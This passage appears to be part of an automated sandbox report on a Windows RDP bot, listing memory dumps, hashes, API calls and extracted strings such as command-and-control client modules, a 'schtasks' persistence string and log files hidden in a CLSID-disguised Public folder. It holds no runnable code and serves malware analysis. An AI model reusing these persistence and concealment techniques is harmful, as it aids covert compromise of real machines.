                                    • Opcode ID: bdf5231d5a7a62b8eeffd5079e20df21f436e944fc87a69db881656bff7e6d57
                                    • Instruction ID: b929aa87d50cca38b3a3188909785b7d0f0c71288200dca2055b40907afee715
                                    • Opcode Fuzzy Hash: bdf5231d5a7a62b8eeffd5079e20df21f436e944fc87a69db881656bff7e6d57
                                    • Instruction Fuzzy Hash: 8531FAD0B0D683C1FB7A4734DCD0BBA52509F6B704E600536C54EC62B5AEEEAE9CC281
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strlen$strcpy
                                    • String ID: *$schtasks
                                    • API String ID: 2790333442-2394224502
                                    • Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                    • Instruction ID: b756dd8959148c77abbd8183d33244a354df22fb44a4da298c607ae4497537df
                                    • Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                    • Instruction Fuzzy Hash: 7151B5A2A0C6C3C5FB765A35ED513B95251AB8F384F580035DA4E973FADEACDC058700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                                    • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                                    • API String ID: 3537583691-1494920791
                                    • Opcode ID: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
                                    • Instruction ID: 8c5bab2e9a1e6aa0f2ac203fca1d63839c5dfc1f28e68b56ddec946fcb7459b1
                                    • Opcode Fuzzy Hash: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
                                    • Instruction Fuzzy Hash: 9A419FE1A09A8292EA128B31EC4437E23A5FB56B84F4C45B5DA0D633A9DF3CE545C340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
                                    • API String ID: 513531256-1037688549
                                    • Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                    • Instruction ID: e6f8096aee261ef4cde6e8aac0dbdfd577698e1f053b1dcfc6d4942e116f0ee9
                                    • Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                    • Instruction Fuzzy Hash: F3417DA5A1C6C186F7229B31EC507BAB2A0EB8A780F500035DE4DC77A5DFACED91C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                                    • API String ID: 513531256-4171087551
                                    • Opcode ID: 1c78b1efae91c39788277ccbb029fb8becfea4ebd31fac5e190fe197ddb8946f
                                    • Instruction ID: 7d7b3520793ae13bfd512f331d0a2bf302511ea73d1187dd70641b24301ed523
                                    • Opcode Fuzzy Hash: 1c78b1efae91c39788277ccbb029fb8becfea4ebd31fac5e190fe197ddb8946f
                                    • Instruction Fuzzy Hash: B0417131A0FA85CAF330BB54E8513B9E2A1FB94780FC600B5EA0D576A5CF3CE5428760
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: _errno$strtol
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                    • API String ID: 3596500743-1991603811
                                    • Opcode ID: 6e97245f22c7f66e2efc42f922bc7edc8d0a87e4aaaa117f4e926190ba981787
                                    • Instruction ID: 3ad3503f8fba6ed20b469de6c11a5ed060d2c8d430297a0f33a743875d8546b2
                                    • Opcode Fuzzy Hash: 6e97245f22c7f66e2efc42f922bc7edc8d0a87e4aaaa117f4e926190ba981787
                                    • Instruction Fuzzy Hash: BC21B1A9A0868791EB529F21ED857AE7360BB847D4F080071EECC57BA5DF3CD946C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 11288a4003739287dbdb619e60809e9528f7172e8861f30cee537802ce7c250d
                                    • Instruction ID: ef7040a4f585e07e99d0f0ee843cfd47d7e6c423058b3cd191756071a4b9c781
                                    • Opcode Fuzzy Hash: 11288a4003739287dbdb619e60809e9528f7172e8861f30cee537802ce7c250d
                                    • Instruction Fuzzy Hash: 21218CB1A0CA8695F6129F25EC417AA7361AB46B84F44403AFE4C87674CFBCED85C701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 82277fde316036396cc3a27ca53206fad783eaa24996ea684cca2dd4cc975119
                                    • Instruction ID: 60209933889b978dceb563480f24482e712133b6c85443a900c6577d30d85bdf
                                    • Opcode Fuzzy Hash: 82277fde316036396cc3a27ca53206fad783eaa24996ea684cca2dd4cc975119
                                    • Instruction Fuzzy Hash: 13215CA1A0CA8385F3129F25ED407EA3264BB4A784F444032EE4D87674DFBCEC85C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
                                    • Instruction ID: 9ee56d4b920e45d51ea306688e0daa03184a4d19419da0d2fd2daa19e61d8e90
                                    • Opcode Fuzzy Hash: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
                                    • Instruction Fuzzy Hash: 0F21A0A1A08AC285E6128F25FC407AE3366BB56788F4C4272EE4D17768CF3DE945C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 8dc6ef3c3b39a945c0bcc25fab0e5f362bdcd5fceaf0a0628a5bcb49c999219e
                                    • Instruction ID: 7cc0ed81775a87bd8bf5feb89fdf2e9cae9bfcb9bde9f6bd0a2f329b227f0bd4
                                    • Opcode Fuzzy Hash: 8dc6ef3c3b39a945c0bcc25fab0e5f362bdcd5fceaf0a0628a5bcb49c999219e
                                    • Instruction Fuzzy Hash: D121B1A9608A8795E6528F25FC847AE3360FB84784F484072EECD57B64DF3CE945C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 9e9fbaff18e4b396b03782fd795c7ec30d8bc7ac6403233c61c7621373ecb548
                                    • Instruction ID: 3150207f06597a5956c7d2572b9f94646643f28426865bb48cba3ab63b7e55a6
                                    • Opcode Fuzzy Hash: 9e9fbaff18e4b396b03782fd795c7ec30d8bc7ac6403233c61c7621373ecb548
                                    • Instruction Fuzzy Hash: 412168A2A0CA8695F6569F25FC407AA3360BF46784F444132EE4C87764CFBCDE89C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 906b3befdbbb04dcb081f3fc279d4ed90d08040fd0ea7b8ae214153b734c3134
                                    • Instruction ID: eeb607ee3109cb5fdbabfbfb173bf5248128c794575f1ed9e1e93a8253a954b6
                                    • Opcode Fuzzy Hash: 906b3befdbbb04dcb081f3fc279d4ed90d08040fd0ea7b8ae214153b734c3134
                                    • Instruction Fuzzy Hash: 10217CA2618ACB96E7529F25EC407AE3364BB46B88F484072EE4C57A64DF3CD946C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: 78db09826294c9814c6a24a45369037db7cb34c45d54d20db4ea96e6f6016017
                                    • Instruction ID: 619cfd2182145470c652f5b900436514b4ce63a80a1b40c4996e2d34b7c2119a
                                    • Opcode Fuzzy Hash: 78db09826294c9814c6a24a45369037db7cb34c45d54d20db4ea96e6f6016017
                                    • Instruction Fuzzy Hash: 2E4104F1B0C68792FA168B64ED403F97260AB02798F84413AFA5D865B4DFFCAE45C311
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
                                    • Instruction ID: d11845a2c2922702f94e2ab57abae62b704c9d016acf5a3bff74da2074d95b5b
                                    • Opcode Fuzzy Hash: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
                                    • Instruction Fuzzy Hash: 644122E1A086C795FA56CB71EC413FC6351BB26348F4C45B2D94E261A9DF7CE64AC300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: cd5d41a576a556bf55237428aebfa2e7841c9249cb31dc30db104d33d1e7f57a
                                    • Instruction ID: db6438c89e488961b8d872357730d80bcbd55c2715b7cd94eab91dae0d1ab10a
                                    • Opcode Fuzzy Hash: cd5d41a576a556bf55237428aebfa2e7841c9249cb31dc30db104d33d1e7f57a
                                    • Instruction Fuzzy Hash: 9941EAE9A08687A1FA128F71ED993BD6360BB84348F5C41B2E9CD67995DF3CA745C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Similarity
                                    • API ID: strlen
                                    • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                                    • API String ID: 39653677-1686225151
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                                    • API String ID: 513531256-2601447032
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                                    • API String ID: 513531256-1680544107
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                                    • API String ID: 513531256-3034662401
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                                    • API String ID: 513531256-2115573132
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                                    • API String ID: 513531256-2729875187
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                    • API String ID: 2918714741-1670302297
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Similarity
                                    • API ID: CopyErrorFileLastfflushfwrite
                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                    • API String ID: 2887799713-3464183404
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                    • API String ID: 2018770650-4119452840
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                    • API String ID: 1802528911-690514478
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                    • API String ID: 1802528911-690514478
                                    • Opcode ID: 5a0cdcd8f416ed66487816ec89a7f52511c8f7a9cc189daedb820147a4bc70b3
                                    • Instruction ID: fc8e6dd26f09dbb4353af06d403c11348785cd4298675adc4bb768d710a87be0
                                    • Opcode Fuzzy Hash: 5a0cdcd8f416ed66487816ec89a7f52511c8f7a9cc189daedb820147a4bc70b3
                                    • Instruction Fuzzy Hash: 5721ACDDB1859252EA264E36ED887BC52516F45BF4E5C03B1ECFC6BAD2CE2CA4068300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 563ddabfb48b2fb7adaf85913b3868276469f5da26aa7f8a09d5ab07382f0a19
                                    • Instruction ID: 0077c9263a209edd29888cd8770437ec5db1c7cef728749251ada9d4253052cf
                                    • Opcode Fuzzy Hash: 563ddabfb48b2fb7adaf85913b3868276469f5da26aa7f8a09d5ab07382f0a19
                                    • Instruction Fuzzy Hash: EB114FF1B1C58656F7129B36EC000A5A660AF8A754F104235E96EC7AB4DFBCD949CB01
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: a21834a11399443f0de9274977709dfe95cab02b693ae6e1d22ed39eea4ac6ff
                                    • Instruction ID: 8fe9edc0b7cbe39d3be86a48df5704d508a3b79c1f5fe0fa01e7cbc5954b0de7
                                    • Opcode Fuzzy Hash: a21834a11399443f0de9274977709dfe95cab02b693ae6e1d22ed39eea4ac6ff
                                    • Instruction Fuzzy Hash: 751160B1E0C59286F361AB3AED044756660AF8A754F104231EA6DC77B4DFBCD90A8B01
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
                                    • Instruction ID: b0279676bdb29b3099af39c548b54306adb614cf4f7526df999cc42e77503d58
                                    • Opcode Fuzzy Hash: 8653497b7e3f6a2a250fc30739b801d90f6e2000c93844efd4fda9f66f1e3821
                                    • Instruction Fuzzy Hash: 6711D3F0A1818646E312AF35EC0046D6661FF9A744F184776E96EA3BB9DF7CD509CB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 3cd94d6c356d44df4bfa6723fe0ba7b692f9cdc644e8cf44acc47bf9408d8014
                                    • Instruction ID: 912e88a04a2b9891d319ca04ba56496cfe10cb964c7b282e954cc2b124c8f5aa
                                    • Opcode Fuzzy Hash: 3cd94d6c356d44df4bfa6723fe0ba7b692f9cdc644e8cf44acc47bf9408d8014
                                    • Instruction Fuzzy Hash: 0A1196F9A0858256F3119F36FC4826D6660BF84754F1443B5E9DDA3AA4DF7CD50A8B00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 9c2fe581f74b2f5098a5e141fddf0f3e6d478d7830d01169853c6c749ca42601
                                    • Instruction ID: 97670bb3089fe0c789bad7f70561a16d69f14abb6a93dd3bbaafb0b5b96123fd
